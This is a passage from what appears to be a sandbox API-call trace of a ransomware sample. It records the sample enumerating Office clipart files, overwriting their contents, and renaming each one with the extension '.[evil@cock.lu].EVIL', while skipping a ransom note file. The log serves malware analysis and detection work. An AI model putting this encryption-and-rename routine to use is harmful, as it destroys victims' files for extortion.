_ShFlag=64) returned 0x7ffc020ee2a0 [0158.356] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.356] __uncaught_exception () returned 0x84b1160800 [0158.356] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.356] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00512_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00512_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00512_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00512_.wmf.[evil@cock.lu].evil")) returned 1 [0158.357] ??_V@YAXPEAX@Z () returned 0x1 [0158.360] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00512_.WMF", dwFileAttributes=0x200) returned 0 [0158.360] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.360] wcsstr (_Str="NA00523_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.360] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00523_.WMF") returned 69 [0158.360] wcscmp (_String1="NA00523_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.360] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00523_.WMF") returned 0x0 [0158.360] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00523_.WMF") returned 0x45 [0158.360] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00523_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00523_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.362] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6efa, lpOverlapped=0x0) returned 1 [0158.369] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.369] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.369] _errno () returned 0x84b1160840 [0158.369] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.369] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x6f00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6f00, lpOverlapped=0x0) returned 1 [0158.369] CloseHandle (hObject=0x1a8) returned 1 [0158.369] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00523_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.370] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.370] __uncaught_exception () returned 0x84b1160800 [0158.370] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.370] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00523_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00523_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00523_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00523_.wmf.[evil@cock.lu].evil")) returned 1 [0158.371] ??_V@YAXPEAX@Z () returned 0x1 [0158.374] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00523_.WMF", dwFileAttributes=0x200) returned 0 [0158.374] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.374] wcsstr (_Str="NA00525_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.374] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00525_.WMF") returned 69 [0158.374] wcscmp (_String1="NA00525_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.374] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00525_.WMF") returned 0x0 [0158.374] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00525_.WMF") returned 0x45 [0158.374] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.376] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5880, lpOverlapped=0x0) returned 1 [0158.843] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.843] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.843] _errno () returned 0x84b1160840 [0158.844] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.844] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x58a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x58a0, lpOverlapped=0x0) returned 1 [0158.844] CloseHandle (hObject=0x1a8) returned 1 [0158.844] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00525_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.844] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.844] __uncaught_exception () returned 0x84b1160800 [0158.844] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.844] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00525_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00525_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00525_.wmf.[evil@cock.lu].evil")) returned 1 [0158.845] ??_V@YAXPEAX@Z () returned 0x1 [0158.848] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00525_.WMF", dwFileAttributes=0x200) returned 0 [0158.848] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.862] wcsstr (_Str="NA00530_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.862] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00530_.WMF") returned 69 [0158.862] wcscmp (_String1="NA00530_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.862] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00530_.WMF") returned 0x0 [0158.862] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00530_.WMF") returned 0x45 [0158.862] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00530_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00530_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.864] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x477c, lpOverlapped=0x0) returned 1 [0158.866] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.866] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.866] _errno () returned 0x84b1160840 [0158.866] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.866] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4780, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4780, lpOverlapped=0x0) returned 1 [0158.866] CloseHandle (hObject=0x1a8) returned 1 [0158.866] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00530_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.867] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.867] __uncaught_exception () returned 0x84b1160800 [0158.867] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.867] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00530_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00530_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00530_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00530_.wmf.[evil@cock.lu].evil")) returned 1 [0158.868] ??_V@YAXPEAX@Z () returned 0x1 [0158.870] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00530_.WMF", dwFileAttributes=0x200) returned 0 [0158.871] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.871] wcsstr (_Str="NA00532_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.871] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00532_.WMF") returned 69 [0158.871] wcscmp (_String1="NA00532_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.871] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00532_.WMF") returned 0x0 [0158.871] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00532_.WMF") returned 0x45 [0158.871] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00532_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00532_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.873] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x530, lpOverlapped=0x0) returned 1 [0158.875] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.875] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.875] _errno () returned 0x84b1160840 [0158.875] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.875] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x540, lpOverlapped=0x0) returned 1 [0158.875] CloseHandle (hObject=0x1a8) returned 1 [0158.875] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00532_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.875] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.876] __uncaught_exception () returned 0x84b1160800 [0158.876] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.876] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00532_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00532_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00532_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00532_.wmf.[evil@cock.lu].evil")) returned 1 [0158.877] ??_V@YAXPEAX@Z () returned 0x1 [0158.879] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00532_.WMF", dwFileAttributes=0x200) returned 0 [0158.880] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.880] wcsstr (_Str="NA00538_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.880] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00538_.WMF") returned 69 [0158.880] wcscmp (_String1="NA00538_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.880] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00538_.WMF") returned 0x0 [0158.880] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00538_.WMF") returned 0x45 [0158.880] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00538_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00538_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.882] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7d14, lpOverlapped=0x0) returned 1 [0158.896] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.896] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.896] _errno () returned 0x84b1160840 [0158.896] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.896] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x7d20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d20, lpOverlapped=0x0) returned 1 [0158.896] CloseHandle (hObject=0x1a8) returned 1 [0158.896] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00538_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.896] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.897] __uncaught_exception () returned 0x84b1160800 [0158.897] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.897] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00538_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00538_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00538_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00538_.wmf.[evil@cock.lu].evil")) returned 1 [0158.898] ??_V@YAXPEAX@Z () returned 0x1 [0158.900] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00538_.WMF", dwFileAttributes=0x200) returned 0 [0158.900] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.900] wcsstr (_Str="NA00641_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.900] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00641_.WMF") returned 69 [0158.901] wcscmp (_String1="NA00641_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.901] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00641_.WMF") returned 0x0 [0158.901] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00641_.WMF") returned 0x45 [0158.901] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00641_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00641_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.902] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x64c, lpOverlapped=0x0) returned 1 [0158.905] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.905] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.905] _errno () returned 0x84b1160840 [0158.905] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.905] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x660, lpOverlapped=0x0) returned 1 [0158.905] CloseHandle (hObject=0x1a8) returned 1 [0158.905] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00641_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.905] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.906] __uncaught_exception () returned 0x84b1160800 [0158.906] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.906] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00641_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00641_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00641_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00641_.wmf.[evil@cock.lu].evil")) returned 1 [0158.906] ??_V@YAXPEAX@Z () returned 0x1 [0158.909] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00641_.WMF", dwFileAttributes=0x200) returned 0 [0158.909] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.909] wcsstr (_Str="NA00784_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.909] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00784_.WMF") returned 69 [0158.909] wcscmp (_String1="NA00784_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.909] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00784_.WMF") returned 0x0 [0158.909] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00784_.WMF") returned 0x45 [0158.909] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00784_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00784_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.911] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7658, lpOverlapped=0x0) returned 1 [0158.926] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.926] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.926] _errno () returned 0x84b1160840 [0158.926] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.926] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x7660, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7660, lpOverlapped=0x0) returned 1 [0158.926] CloseHandle (hObject=0x1a8) returned 1 [0158.927] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00784_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.927] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.927] __uncaught_exception () returned 0x84b1160800 [0158.927] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.927] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00784_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00784_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00784_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00784_.wmf.[evil@cock.lu].evil")) returned 1 [0158.928] ??_V@YAXPEAX@Z () returned 0x1 [0158.932] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00784_.WMF", dwFileAttributes=0x200) returned 0 [0158.932] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.932] wcsstr (_Str="NA00798_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.932] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00798_.WMF") returned 69 [0158.932] wcscmp (_String1="NA00798_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.932] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00798_.WMF") returned 0x0 [0158.932] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00798_.WMF") returned 0x45 [0158.932] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00798_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00798_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.934] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x23f8, lpOverlapped=0x0) returned 1 [0158.943] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.943] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.943] _errno () returned 0x84b1160840 [0158.943] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.943] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2400, lpOverlapped=0x0) returned 1 [0158.943] CloseHandle (hObject=0x1a8) returned 1 [0158.943] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00798_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.944] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.944] __uncaught_exception () returned 0x84b1160800 [0158.944] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.944] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00798_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00798_.wmf"), 